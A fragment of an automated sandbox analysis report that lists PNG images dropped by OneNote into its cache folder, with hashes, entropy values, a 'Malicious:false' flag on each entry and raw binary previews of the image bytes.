                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
